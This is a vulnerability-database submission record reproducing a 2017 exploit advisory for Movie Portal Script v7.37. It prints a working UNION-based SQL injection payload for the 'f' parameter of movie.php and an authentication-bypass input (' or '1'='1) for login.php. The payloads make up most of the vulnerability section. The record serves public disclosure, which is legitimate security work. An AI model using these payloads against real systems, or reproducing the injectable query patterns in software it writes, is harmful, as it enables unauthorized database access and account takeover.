| 标题 | Movie Portal Script v7.37 – Multiple Vulnerabilities |
|---|
| 描述 | Introduction
Exploit Title: Movie Portal Script v7.37 – Multiple Vulnerabilities
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/b2b-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Movie Portal Script v7.37 is undoubtedly the finest movie portal.
Vulnerabilities:
------------------------------------------------
SQL Injection
URL : http://localhost/movie-portal-script/movie.php?f=10[payload]
Parameter: f (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 34 columns
Payload: f=-2245 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787a71,0x644b626f666d766b5551474756446f6e596d57784165697044776879524c7264714164476e624e55,0x716a6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- MmOv
------------------------------------------------
Authentication Bypass
http://localhost/movie-portal-script/login.php
username : anyusername
password : ' or '1'='1
------------------------------------------------ |
|---|
| 用户 | KAAN KAMIS (UID 213) |
|---|
| 提交 | 2017-01-30 13時27分 (9 年前) |
|---|
| 管理 | 2017-01-30 21時56分 (8 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 96286 [Movie Portal Script 7.37 movie.php f SQL注入] |
|---|
| 积分 | 17 |
|---|